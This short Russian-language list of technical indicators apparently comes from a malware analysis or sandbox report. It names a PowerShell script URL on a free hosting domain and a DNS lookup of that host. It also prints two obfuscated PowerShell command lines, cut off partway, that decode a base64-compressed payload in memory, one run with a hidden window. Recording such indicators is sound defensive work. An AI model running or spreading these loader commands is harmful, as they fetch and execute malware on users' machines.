Техническая информация
- http://xvfghtyua.000webhostapp.com/sys.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAAAAAAAAAxXHOxKCMBAA0Kvs0ABFAra2amGDhYW2+awkTkh22NXA7R1f96hUXDlgSho3BIUEdifDDCoXAlUhRO8x/5sjKAfN9fKEbsKqbvaNTmBC0Q+0pxQxS6/PpeZUj...
- DNS ASK xv######a.000webhostapp.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAAAAAAAAAxXHOxKCMBAA0Kvs0ABFAra2amGDhYW2+awkTkh22NXA7R1f96hUXDlgSho3BIUEdifDDCoXAlUhRO8x/5sjKAfN9fKEbsKqbvaNTmBC0Q+0pxQxS6/PpeZUj... (со скрытым окном)